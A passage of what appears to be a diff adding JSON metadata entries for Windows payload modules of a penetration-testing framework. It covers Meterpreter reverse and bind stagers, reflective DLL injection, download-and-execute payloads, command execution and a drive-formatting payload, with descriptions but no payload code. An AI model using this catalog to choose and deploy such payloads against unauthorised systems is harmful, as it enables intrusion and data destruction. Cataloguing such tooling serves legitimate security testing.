reflective loader.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_windows/dllinject/reverse_tcp_uuid": { + "name": "Reflective DLL Injection, Reverse TCP Stager with UUID Support", + "fullname": "payload/windows/dllinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker with UUID Support", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_windows/dllinject/reverse_winhttp": { + "name": "Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp)", + "fullname": "payload/windows/dllinject/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "Borja Merino " + ], + "description": "Inject a DLL via a reflective loader.\n\nTunnel communication over HTTP (Windows winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_winhttp.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_winhttp" + }, + "payload_windows/dns_txt_query_exec": { + "name": "DNS TXT Record Payload Download and Execution", + "fullname": "payload/windows/dns_txt_query_exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "corelanc0d3r " + ], + "description": "Performs a TXT query against a series of DNS record(s) and executes the returned x86 shellcode. The DNSZONE\n option is used as the base name to iterate over. The payload will first request the TXT contents of the a\n hostname, followed by b, then c, etc. until there are no more records. For each record that is returned, exactly\n 255 bytes from it are copied into a buffer that is eventually executed. This buffer should be encoded using\n x86/alpha_mixed with the BufferRegister option set to EDI.", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/dns_txt_query_exec.rb", + "is_install_path": true, + "ref_name": "windows/dns_txt_query_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/download_exec": { + "name": "Windows Executable Download (http,https,ftp) and Execute", + "fullname": "payload/windows/download_exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "corelanc0d3r " + ], + "description": "Download an EXE from an HTTP(S)/FTP URL and execute it", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/download_exec.rb", + "is_install_path": true, + "ref_name": "windows/download_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/exec": { + "name": "Windows Execute Command", + "fullname": "payload/windows/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf " + ], + "description": "Execute an arbitrary command", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/exec.rb", + "is_install_path": true, + "ref_name": "windows/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/format_all_drives": { + "name": "Windows Drive Formatter", + "fullname": "payload/windows/format_all_drives", + "aliases": [], + "rank": 0, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ashfaq Ansari ", + "Ruei-Min Jiang " + ], + "description": "This payload formats all mounted disks in Windows (aka ShellcodeOfDeath).\n\n After formatting, this payload sets the volume label to the string specified in\n the VOLUMELABEL option. If the code is unable to access a drive for any reason,\n it skips the drive and proceeds to the next volume.", + "references": [ + "URL-http://hacksys.vfreaks.com/research/shellcode-of-death.html", + "URL-https://github.com/hacksysteam/ShellcodeOfDeath" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/format_all_drives.rb", + "is_install_path": true, + "ref_name": "windows/format_all_drives", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "ShellcodeOfDeath" + ] + }, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/loadlibrary": { + "name": "Windows LoadLibrary Path", + "fullname": "payload/windows/loadlibrary", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm " + ], + "description": "Load an arbitrary library path", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/loadlibrary.rb", + "is_install_path": true, + "ref_name": "windows/loadlibrary", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/messagebox": { + "name": "Windows MessageBox", + "fullname": "payload/windows/messagebox", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "corelanc0d3r ", + "jduck " + ], + "description": "Spawns a dialog via MessageBox using a customizable title, text & icon", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-11-28 06:39:07 +0000", + "path": "/modules/payloads/singles/windows/messagebox.rb", + "is_install_path": true, + "ref_name": "windows/messagebox", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/meterpreter/bind_hidden_ipknock_tcp": { + "name": "Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager", + "fullname": "payload/windows/meterpreter/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "Borja Merino " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection", + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_windows/meterpreter/bind_hidden_tcp": { + "name": "Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager", + "fullname": "payload/windows/meterpreter/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "Borja Merino " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection", + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_windows/meterpreter/bind_ipv6_tcp": { + "name": "Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/windows/meterpreter/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for an IPv6 connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_windows/meterpreter/bind_ipv6_tcp_uuid": { + "name": "Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/meterpreter/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_windows/meterpreter/bind_named_pipe": { + "name": "Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager", + "fullname": "payload/windows/meterpreter/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "UserExistsError" + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a pipe connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_windows/meterpreter/bind_nonx_tcp": { + "name": "Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)", + "fullname": "payload/windows/meterpreter/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "vlad902 " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection (No NX)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_windows/meterpreter/bind_tcp": { + "name": "Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)", + "fullname": "payload/windows/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_tcp" + }, + "payload_windows/meterpreter/bind_tcp_rc4": { + "name": "Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/meterpreter/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "RageLtMan" + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_windows/meterpreter/bind_tcp_uuid": { + "name": "Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_windows/meterpreter/find_tag": { + "name": "Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager", + "fullname": "payload/windows/meterpreter/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nUse an established connection", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/findtag_ord.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/findtag_ord" + }, + "payload_windows/meterpreter/reverse_http": { + "name": "Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet)", + "fullname": "payload/windows/meterpreter/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_http.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_http" + }, + "payload_windows/meterpreter/reverse_http_proxy_pstore": { + "name": "Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy", + "fullname": "payload/windows/meterpreter/reverse_http_proxy_pstore", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_http_proxy_pstore", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_http_proxy_pstore" + }, + "payload_windows/meterpreter/reverse_https": { + "name": "Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)", + "fullname": "payload/windows/meterpreter/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTPS (Windows wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_https.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_https" + }, + "payload_windows/meterpreter/reverse_ipv6_tcp": { + "name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)", + "fullname": "payload/windows/meterpreter/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker over IPv6", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_windows/meterpreter/reverse_named_pipe": { + "name": "Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/windows/meterpreter/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_named_pipe" + }, + "payload_windows/meterpreter/reverse_nonx_tcp": { + "name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/windows/meterpreter/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "vlad902 " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker (No NX)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_windows/meterpreter/reverse_ord_tcp": { + "name": "Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/windows/meterpreter/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "spoonm " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_windows/meterpreter/reverse_tcp": { + "name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager", + "fullname": "payload/windows/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_tcp" + }, + "payload_windows/meterpreter/reverse_tcp_allports": { + "name": "Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager", + "fullname": "payload/windows/meterpreter/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + 